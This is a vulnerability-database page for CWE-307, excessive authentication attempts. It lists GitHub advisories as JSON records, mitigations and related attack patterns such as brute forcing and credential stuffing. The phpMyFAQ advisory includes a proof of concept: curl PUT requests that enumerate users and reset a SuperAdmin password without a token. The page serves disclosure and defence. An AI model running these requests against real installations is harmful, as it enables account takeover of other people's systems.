CWE-307
AllowedImproper Restriction of Excessive Authentication Attempts
Abstraction: Base · Status: Draft
The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.
900 vulnerabilities reference this CWE, most recent first.
GHSA-W9C3-H2RQ-JRFF
Vulnerability from github – Published: 2022-05-24 17:39 – Updated: 2022-05-24 17:39In Discourse 2.7.0 through beta1, a rate-limit bypass leads to a bypass of the 2FA requirement for certain forms.
{
"affected": [],
"aliases": [
"CVE-2021-3138"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-14T04:15:00Z",
"severity": "HIGH"
},
"details": "In Discourse 2.7.0 through beta1, a rate-limit bypass leads to a bypass of the 2FA requirement for certain forms.",
"id": "GHSA-w9c3-h2rq-jrff",
"modified": "2022-05-24T17:39:24Z",
"published": "2022-05-24T17:39:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3138"
},
{
"type": "WEB",
"url": "https://blog.discourse.org"
},
{
"type": "WEB",
"url": "https://github.com/Mesh3l911/Disource"
},
{
"type": "WEB",
"url": "https://github.com/discourse/discourse/releases"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/162256/Discourse-2.7.0-2FA-Bypass.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-W9JF-WGXM-GGQJ
Vulnerability from github – Published: 2024-02-22 12:30 – Updated: 2024-02-22 12:30An unauthenticated remote attacker can bypass the brute force prevention mechanism and disturb the webservice for all users.
{
"affected": [],
"aliases": [
"CVE-2024-1104"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-22T12:15:46Z",
"severity": "HIGH"
},
"details": "An unauthenticated remote attacker can bypass the brute force prevention mechanism and disturb the webservice for all users.",
"id": "GHSA-w9jf-wgxm-ggqj",
"modified": "2024-02-22T12:30:57Z",
"published": "2024-02-22T12:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1104"
},
{
"type": "WEB",
"url": "https://www.areal-topkapi.com/en/services/security-bulletins"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-W9RV-X77P-3MVC
Vulnerability from github – Published: 2025-11-12 15:31 – Updated: 2025-11-12 15:31CWE-307: Improper Restriction of Excessive Authentication Attempts vulnerability exists that would allow an attacker on the local network to gain access to the user account by performing an arbitrary number of authentication attempts with different credentials on the /REST/shutdownnow endpoint.
{
"affected": [],
"aliases": [
"CVE-2025-11566"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-12T14:15:46Z",
"severity": "MODERATE"
},
"details": "CWE-307: Improper Restriction of Excessive Authentication Attempts vulnerability exists that would allow an attacker on the local network to gain access to the user account by performing an arbitrary number of authentication attempts with different credentials on the /REST/shutdownnow endpoint.",
"id": "GHSA-w9rv-x77p-3mvc",
"modified": "2025-11-12T15:31:29Z",
"published": "2025-11-12T15:31:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11566"
},
{
"type": "WEB",
"url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-315-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2025-315-01.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-W9XH-5F39-VQ89
Vulnerability from github – Published: 2026-05-20 15:46 – Updated: 2026-05-28 14:20Summary
An authentication bypass vulnerability in phpMyFAQ allows any unauthenticated attacker to reset the password of any user account, including SuperAdmin accounts. By sending a PUT request with just a valid username and associated email address to /api/user/password/update, an attacker receives a new plaintext password via email without any token verification, rate limiting, or email confirmation. This enables complete account takeover of any user, including full administrative access.
Details
File: phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/UnauthorizedUserController.php Lines: 56-130 The updatePassword() method at line 56 accepts PUT requests to /user/password/update with only username and email in the JSON body:
[Route(path: 'user/password/update', name: 'api.private.user.password', methods: ['PUT'])]
public function updatePassword(Request $request): JsonResponse
{
$data = json_decode($request->getContent());
$username = trim((string) Filter::filterVar($data->username, FILTER_SANITIZE_SPECIAL_CHARS));
$email = trim((string) Filter::filterEmail($data->email));
if ($username !== '' && $username !== '0' && ($email !== '' && $email !== '0')) {
$user = ($this->currentUserFactory ?? CurrentUser::getCurrentUser(...))($this->configuration);
$loginExist = $user->getUserByLogin($username);
if ($loginExist && $email === $user->getUserData('email')) {
// NO TOKEN CHECK
// NO RATE LIMITING
// NO EMAIL VERIFICATION
$newPassword = $user->createPassword();
$user->changePassword($newPassword);
$mail->send(); // New password sent in plaintext
}
}
}
Root Causes:
- No time-limited cryptographic token required for password reset
- No rate limiting on the endpoint (allows unlimited username/email enumeration)
- No verification email sent to original address before reset
- New password sent in plaintext email without any confirmation step
PoC
Prerequisites: None (unauthenticated attack) Step 1 - Username/Email Enumeration (no rate limiting): Test with wrong email - reveals if user exists
curl -X PUT -H "Content-Type: application/json" \
-d '{"username":"admin","email":"wrong@test.com"}' \
http://target/phpmyfaq/api/user/password/update
Response: {"error":"The email doesn't exist..."} <- user exists but wrong email
OR
Response: {"error":"The user doesn't exist"} <- user doesn't exist
Step 2 - Password Reset (no token required):
curl -X PUT -H "Content-Type: application/json" \
-d '{"username":"admin","email":"admin@target.com"}' \
http://target/phpmyfaq/api/user/password/update
Response: {"success":"Email has been sent."} The new plaintext password is sent to admin@target.com
Step 3 - Account Takeover: Attacker now has valid credentials and can log in as SuperAdmin.
Impact
Aspect Details Vulnerability Type Authentication Bypass / Weak Password Recovery Mechanism (CWE-640) Attack Vector Network (unauthenticated HTTP request) Privileges Required None User Interaction None Scope Full administrative access to phpMyFAQ Confidentiality High - attacker gains full access to all user data and FAQ content Integrity High - attacker can modify all content and settings Availability High - attacker can lock out legitimate users Who is Impacted: - All phpMyFAQ administrators using default installations - Any organization using phpMyFAQ for internal knowledge bases - End users whose accounts could be compromised - Organizations relying on phpMyFAQ for customer support FAQs Attack Complexity: Very Low - no special knowledge or conditions required beyond knowing/guessing a valid username and associated email address
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "thorsten/phpmyfaq"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpmyfaq/phpmyfaq"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35675"
],
"database_specific": {
"cwe_ids": [
"CWE-307",
"CWE-359",
"CWE-640"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-20T15:46:55Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nAn authentication bypass vulnerability in phpMyFAQ allows any unauthenticated attacker to reset the password of any user account, including SuperAdmin accounts. By sending a PUT request with just a valid username and associated email address to /api/user/password/update, an attacker receives a new plaintext password via email without any token verification, rate limiting, or email confirmation. This enables complete account takeover of any user, including full administrative access.\n\n\n### Details\nFile: phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/UnauthorizedUserController.php\nLines: 56-130\nThe updatePassword() method at line 56 accepts PUT requests to /user/password/update with only username and email in the JSON body:\n#[Route(path: \u0027user/password/update\u0027, name: \u0027api.private.user.password\u0027, methods: [\u0027PUT\u0027])]\n```php\npublic function updatePassword(Request $request): JsonResponse\n{\n $data = json_decode($request-\u003egetContent());\n $username = trim((string) Filter::filterVar($data-\u003eusername, FILTER_SANITIZE_SPECIAL_CHARS));\n $email = trim((string) Filter::filterEmail($data-\u003eemail));\n if ($username !== \u0027\u0027 \u0026\u0026 $username !== \u00270\u0027 \u0026\u0026 ($email !== \u0027\u0027 \u0026\u0026 $email !== \u00270\u0027)) {\n $user = ($this-\u003ecurrentUserFactory ?? CurrentUser::getCurrentUser(...))($this-\u003econfiguration);\n $loginExist = $user-\u003egetUserByLogin($username);\n if ($loginExist \u0026\u0026 $email === $user-\u003egetUserData(\u0027email\u0027)) {\n // NO TOKEN CHECK\n // NO RATE LIMITING\n // NO EMAIL VERIFICATION\n $newPassword = $user-\u003ecreatePassword();\n $user-\u003echangePassword($newPassword);\n $mail-\u003esend(); // New password sent in plaintext\n }\n }\n}\n\n\n```\n\n### Root Causes:\n1. No time-limited cryptographic token required for password reset\n2. No rate limiting on the endpoint (allows unlimited username/email enumeration)\n3. No verification email sent to original address before reset\n4. New password sent in plaintext email without any confirmation step\n\n\n### PoC\nPrerequisites: None (unauthenticated attack)\nStep 1 - Username/Email Enumeration (no rate limiting):\nTest with wrong email - reveals if user exists\n```bash\ncurl -X PUT -H \"Content-Type: application/json\" \\\n -d \u0027{\"username\":\"admin\",\"email\":\"wrong@test.com\"}\u0027 \\\n http://target/phpmyfaq/api/user/password/update\n```\nResponse: {\"error\":\"The email doesn\u0027t exist...\"} \u003c- user exists but wrong email\n\nOR\n\nResponse: {\"error\":\"The user doesn\u0027t exist\"} \u003c- user doesn\u0027t exist\n\nStep 2 - Password Reset (no token required):\n```bash\ncurl -X PUT -H \"Content-Type: application/json\" \\\n -d \u0027{\"username\":\"admin\",\"email\":\"admin@target.com\"}\u0027 \\\n http://target/phpmyfaq/api/user/password/update\n```\n\nResponse: {\"success\":\"Email has been sent.\"}\nThe new plaintext password is sent to admin@target.com\n\nStep 3 - Account Takeover:\nAttacker now has valid credentials and can log in as SuperAdmin.\n\n\n\n### Impact\nAspect\tDetails\nVulnerability Type\tAuthentication Bypass / Weak Password Recovery Mechanism (CWE-640)\nAttack Vector\tNetwork (unauthenticated HTTP request)\nPrivileges Required\tNone\nUser Interaction\tNone\nScope\tFull administrative access to phpMyFAQ\nConfidentiality\tHigh - attacker gains full access to all user data and FAQ content\nIntegrity\tHigh - attacker can modify all content and settings\nAvailability\tHigh - attacker can lock out legitimate users\nWho is Impacted:\n- All phpMyFAQ administrators using default installations\n- Any organization using phpMyFAQ for internal knowledge bases\n- End users whose accounts could be compromised\n- Organizations relying on phpMyFAQ for customer support FAQs\nAttack Complexity: Very Low - no special knowledge or conditions required beyond knowing/guessing a valid username and associated email address",
"id": "GHSA-w9xh-5f39-vq89",
"modified": "2026-05-28T14:20:34Z",
"published": "2026-05-20T15:46:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-w9xh-5f39-vq89"
},
{
"type": "PACKAGE",
"url": "https://github.com/thorsten/phpMyFAQ"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "phpMyFAQ: Missing Password Reset Token Allows Account Takeover via Username/Email Enumeration"
}
GHSA-W9XP-XGF9-CVCF
Vulnerability from github – Published: 2025-06-22 00:30 – Updated: 2025-06-30 18:31Yealink YMCS RPS before 2025-06-04 lacks SN verification attempt limits, enabling brute-force enumeration (last five digits).
{
"affected": [],
"aliases": [
"CVE-2025-52916"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-21T23:15:23Z",
"severity": "LOW"
},
"details": "Yealink YMCS RPS before 2025-06-04 lacks SN verification attempt limits, enabling brute-force enumeration (last five digits).",
"id": "GHSA-w9xp-xgf9-cvcf",
"modified": "2025-06-30T18:31:46Z",
"published": "2025-06-22T00:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52916"
},
{
"type": "WEB",
"url": "https://dnip.ch/2025/06/25/yealink-voip-phones-insecurity-by-design"
},
{
"type": "WEB",
"url": "https://seclists.org/fulldisclosure/2025/Jun/20"
},
{
"type": "WEB",
"url": "https://support.yealink.com/en/portal/knowledge/show?id=6476e7cd6a27da76bd06a9c9"
},
{
"type": "WEB",
"url": "https://www.yealink.com/en/trust-center/security-advisories/b8dc062eaa8d4f59"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WC3Q-3RX5-32WC
Vulnerability from github – Published: 2026-02-27 03:30 – Updated: 2026-03-05 21:30The WebSocket Application Programming Interface lacks restrictions on the number of authentication requests. This absence of rate limiting may allow an attacker to conduct denial-of-service attacks by suppressing or mis-routing legitimate charger telemetry, or conduct brute-force attacks to gain unauthorized access.
{
"affected": [],
"aliases": [
"CVE-2026-26305"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-27T01:16:20Z",
"severity": "HIGH"
},
"details": "The WebSocket Application Programming Interface lacks restrictions on \nthe number of authentication requests. This absence of rate limiting may\n allow an attacker to conduct denial-of-service attacks by suppressing \nor mis-routing legitimate charger telemetry, or conduct brute-force \nattacks to gain unauthorized access.",
"id": "GHSA-wc3q-3rx5-32wc",
"modified": "2026-03-05T21:30:27Z",
"published": "2026-02-27T03:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26305"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-057-08.json"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-057-08"
},
{
"type": "WEB",
"url": "https://www.mobility46.se/en/contact-us"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-WHCV-8X9M-33FH
Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2022-05-24 17:48Gestsup before 3.2.10 allows account takeover through the password recovery functionality (remote). The affected component is the file forgot_pwd.php - it uses a weak algorithm for the generation of password recovery tokens (the PHP uniqueid function), allowing a brute force attack.
{
"affected": [],
"aliases": [
"CVE-2021-31646"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-26T19:15:00Z",
"severity": "CRITICAL"
},
"details": "Gestsup before 3.2.10 allows account takeover through the password recovery functionality (remote). The affected component is the file forgot_pwd.php - it uses a weak algorithm for the generation of password recovery tokens (the PHP uniqueid function), allowing a brute force attack.",
"id": "GHSA-whcv-8x9m-33fh",
"modified": "2022-05-24T17:48:54Z",
"published": "2022-05-24T17:48:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31646"
},
{
"type": "WEB",
"url": "https://dojo.maltem.ca/public/advisories/CVE-2021-31646.html"
},
{
"type": "WEB",
"url": "https://gestsup.fr/index.php?page=download"
},
{
"type": "WEB",
"url": "https://gestsup.fr/index.php?page=download\u0026channel=beta\u0026version=3.2.10\u0026type=patch"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-WHHC-F8FH-M5CR
Vulnerability from github – Published: 2026-04-21 12:30 – Updated: 2026-05-06 18:30This vulnerability exists in Quantum Networks router due to missing rate limiting and CAPTCHA protection for failed login attempts in the web-based management interface. An attacker on the same network could exploit this vulnerability by performing brute force attacks against administrative credentials, leading to unauthorized access with root privileges on the targeted device.
{
"affected": [],
"aliases": [
"CVE-2026-41037"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-21T10:16:30Z",
"severity": "HIGH"
},
"details": "This vulnerability exists in Quantum Networks router due to missing rate limiting and CAPTCHA protection for failed login attempts in the web-based management interface. An attacker on the same network could exploit this vulnerability by performing brute force attacks against administrative credentials, leading to unauthorized access with root privileges on the targeted device.",
"id": "GHSA-whhc-f8fh-m5cr",
"modified": "2026-05-06T18:30:25Z",
"published": "2026-04-21T12:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41037"
},
{
"type": "WEB",
"url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2026-0200"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-WJG3-46V4-3F44
Vulnerability from github – Published: 2022-10-28 19:00 – Updated: 2022-11-01 19:00Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification. \n\nFor the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.
{
"affected": [],
"aliases": [
"CVE-2022-3741"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-28T13:15:00Z",
"severity": "CRITICAL"
},
"details": "Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification. \\n\\nFor the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.",
"id": "GHSA-wjg3-46v4-3f44",
"modified": "2022-11-01T19:00:27Z",
"published": "2022-10-28T19:00:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3741"
},
{
"type": "WEB",
"url": "https://github.com/chatwoot/chatwoot/commit/9525d4f0346a2fdac13a0253f9180d20104a72d3"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/46f6e07e-f438-4540-938a-510047f987d0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WMH3-5PFQ-QPP8
Vulnerability from github – Published: 2023-03-23 00:30 – Updated: 2025-02-26 00:32Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests.
{
"affected": [],
"aliases": [
"CVE-2023-27100"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-22T23:15:00Z",
"severity": "CRITICAL"
},
"details": "Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests.",
"id": "GHSA-wmh3-5pfq-qpp8",
"modified": "2025-02-26T00:32:07Z",
"published": "2023-03-23T00:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27100"
},
{
"type": "WEB",
"url": "https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc"
},
{
"type": "WEB",
"url": "https://packetstorm.news/files/id/171791"
},
{
"type": "WEB",
"url": "https://redmine.pfsense.org/issues/13574"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/171791/pfsenseCE-2.6.0-Protection-Bypass.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- Common protection mechanisms include:
- Disconnecting the user after a small number of failed attempts
- Implementing a timeout
- Locking out a targeted account
- Requiring a computational task on the user's part.
Mitigation MIT-4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]
CAPEC-16: Dictionary-based Password Attack
An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.
Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.
CAPEC-49: Password Brute Forcing
An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.
CAPEC-560: Use of Known Domain Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.
CAPEC-565: Password Spraying
In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.
CAPEC-600: Credential Stuffing
An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.
CAPEC-652: Use of Known Kerberos Credentials
An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.
CAPEC-653: Use of Known Operating System Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.